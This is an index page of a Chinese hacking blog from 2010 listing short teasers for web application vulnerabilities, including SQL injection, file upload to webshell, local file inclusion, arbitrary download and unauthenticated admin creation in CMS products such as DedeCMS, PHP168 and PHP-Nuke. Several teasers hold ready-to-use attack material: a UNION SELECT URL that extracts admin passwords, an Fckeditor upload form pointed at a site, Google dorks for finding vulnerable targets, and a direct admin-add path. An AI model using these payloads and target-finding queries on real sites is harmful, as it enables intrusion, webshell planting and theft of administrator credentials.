影子鹰安全网络-主站技术BLOG, 进阶式的学习平台...
 
用户登陆
用户:
密码:
   

站点日历
73 2010 - 6 48
  12345
6789101112
13141516171819
20212223242526
27282930

站点统计
日志:1320 篇
评论:3702 篇
引用:303812 个
会员:1170 人
留言:172 个
访问:18749378 次
今日:18670 平均:7000
建站:2001-10-10
在线人数: ?

最新评论

日志搜索

 标题   内容

友情链接
其他信息
影子鹰安全网络-主站技术BLOG
::订阅到抓虾::
订阅到飞鸽
订阅到GOOGLE
订阅到yahoo
订阅到ROJO
RSS 1.0
RSS 2.0
[全部订阅更新]
[鄂ICP备05002492号]
联系我

::影子鹰业务联系专用QQ:;

Gmail:coolkawen(at)Gmail.com站长KAWEN联系方式
QQ群(::Blog交流::)

旗下域名

www.cn9x.com
www.cnyzy.cn


FEED订阅数一览


EMAIL订阅FEED

[1] [2] [3]  显示模式: 默认模式 | 树形模式
晴天 BBSGood论坛程序注入漏洞   [ 2010-06-29 08:05:19  |  影子鹰 ]

BBSGood论坛程序indexlabel.asp和labelsave.asp页面存在SQL注入漏洞

漏洞分析:

阅读全文……
作者:kawen | 分类:黑客攻防 | 评论:0 | 引用:0 | 查看:96
晴天 PHP168 V6 下载任意文件漏洞   [ 2010-06-29 08:04:07  |  影子鹰 ]

PHP168 V6 下载任意文件漏洞
漏洞文件download.php
漏洞相关文件HASH
b912249a22b630c04f7ad65f8ba5a2f6 download.php

阅读全文……
作者:kawen | 分类:黑客攻防 | 评论:0 | 引用:0 | 查看:113
晴天 ShopXp CMS上传漏洞拿Webshell   [ 2010-06-27 08:34:56  |  影子鹰 ]

首先,必须要知道管理员的目录,因为上传只有后台才可以。
在upLoad_bm.asp文件里,首先没有检查来访者的身份。所以可以直接访问
代码如下: 

阅读全文……
作者:kawen | 分类:黑客攻防 | 评论:0 | 引用:0 | 查看:120
晴天 DEDECMS网站管理系统本地包含漏洞   [ 2010-06-27 08:34:18  |  影子鹰 ]

DEDECMS网站管理系统plus/carbuyaction.php本地包含漏洞

DedeCms 基于PHP+MySQL的技术开发,支持Windows、Linux、Unix等多种服务器平台,从2004年开始发布第一个版本开始,至今已经发布了五个大版本。DedeCms以简单、健壮、灵活、开源几大特点占领了国内CMS的大部份市场,目前已经有超过二十万个站点正在使用DedeCms或居于DedeCms核心,是目前国内应用最广泛的php类CMS系统。

漏洞分析:

阅读全文……
作者:kawen | 分类:黑客攻防 | 评论:0 | 引用:0 | 查看:101
晴天 风讯网站管理系统页面存在SQL注入   [ 2010-06-27 08:33:03  |  影子鹰 ]

风讯网站管理系统awardAction.asp页面存在SQL注入

FoosunCMS是一款具有强大的功能的基于ASP+ACCESS/MSSQL构架的内容管理软件。

在文件\User\award\awardAction.asp中:

阅读全文……
作者:kawen | 分类:黑客攻防 | 评论:0 | 引用:0 | 查看:101

VIIShop 网上商店 V1.3.0 Fckeditor 上传漏洞可获取网站的权限。 
测试方法: 
<form id="frmUpload" enctype="multipart/form-data" action="http://www.hackqing.cn/include/fck2/editor/filemanager/upload/php/upload.php?Type=Media" method="post"> 
Upload a new file:<br> 
<input type="file" name="NewFile" size="50"><br> 

阅读全文……
作者:kawen | 分类:黑客攻防 | 评论:0 | 引用:0 | 查看:99
晴天 Software Index 远程文件上传漏洞   [ 2010-06-25 13:01:18  |  影子鹰 ]

上传文件过滤不严,导致远程文件上传可执行代码漏洞。
批量Google Dork : Copyright 2010. Software Index  

Exp:

阅读全文……
作者:kawen | 分类:黑客攻防 | 评论:0 | 引用:0 | 查看:78
晴天 SnowCade v3 SQL 注入漏洞   [ 2010-06-23 09:21:58  |  影子鹰 ]

SnowCade v3多处存在SQL注入攻击漏洞,可获取管理员权限
http://127.0.0.1/index.php?action=browse&cat=[注入语句]

http://127.0.0.1/index.php?action=playgame&gameid=[注入语句]

阅读全文……
作者:kawen | 分类:黑客攻防 | 评论:0 | 引用:0 | 查看:100
晴天 DedeCmsV5.6 本地包含 鸡助0day漏洞   [ 2010-06-21 13:37:18  |  影子鹰 ]

DedeCmsV5.6 程序plus/carbuyaction.php 变量未初始化,造成本地文件包含漏洞。

代码:

<?php     require_once (dirname(__FILE__) . "/../include/common.inc.php");     define('_PLUS_TPL_', DEDEROOT.'/templets/plus');     require_once DEDEINC.'/dedetemplate.class.php';     require_once DEDEINC.'/shopcar.class.php';    require_once DEDEINC.'/memberlogin.class.php';     if($cfg_mb_open=='N')     {             ShowMsg("系统关闭了会员功能,因此你无法访问此页面!","javascript:;");             exit();     }         $cfg_ml = new MemberLogin();      if(!isset($dopost) || empty($dopost)){   //只要$dopost不为空就行,By:qing。             ...      }elseif($dopost == 'return'){             require_once DEDEINC.'/payment/'.$code.'.php'; //变量$code未初始化,           $pay = new $code;             $msg=$pay->respond();             ShowMsg($msg,"javascript:;",0,3000);             exit();      }      ?>   

阅读全文……
作者:kawen | 分类:黑客攻防 | 评论:0 | 引用:0 | 查看:120
晴天 雅琦科技程序 任意添加管理员0day   [ 2010-06-21 13:36:42  |  影子鹰 ]

网站后台缺少验证可远程添加管理员用户并登录后台
关键字:inurl:ShowInfo.asp?ShowId=

找到网站后然后在网站地址后加上:admin/User_Manage.asp?action=UserAdd

阅读全文……
作者:kawen | 分类:黑客攻防 | 评论:0 | 引用:0 | 查看:123
晴天 PHP168 V6.01 权限提升漏洞   [ 2010-06-21 13:34:36  |  影子鹰 ]

PHP168整站是PHP领域当前功能最强大的建站系统,代码全部开源,可极其方便的进行二次开发,所有功能模块可以自由安装与删除,个人用户完全免费使用

HPCMS V6.01存在严重的安全问题

注册一个帐户,进入会员中心。访问http://www.hackqing.cn/member/buygroup.php?job=buy&gid=3

阅读全文……
作者:kawen | 分类:黑客攻防 | 评论:0 | 引用:0 | 查看:111
晴天 PHP-Nuke Module print 6.0 SQL注入漏洞   [ 2010-06-19 08:22:06  |  影子鹰 ]

PHP-Nuke Module print 6.0 网站程序print&sid存在 SQL注入攻击漏洞,可获取管理员密码权限。

EXp:http://www.hackqing.cn/modules.php?name=News&file=print&sid=-1+union+select+1,2,pwd,aid,5,6,7+from+nuke_authors--

阅读全文……
作者:kawen | 分类:黑客攻防 | 评论:0 | 引用:0 | 查看:98
[1] [2] [3] 
  Powered by www.cnyzy.cn Rights © 2006 Processed in 0.531250 second(s) , 5 queries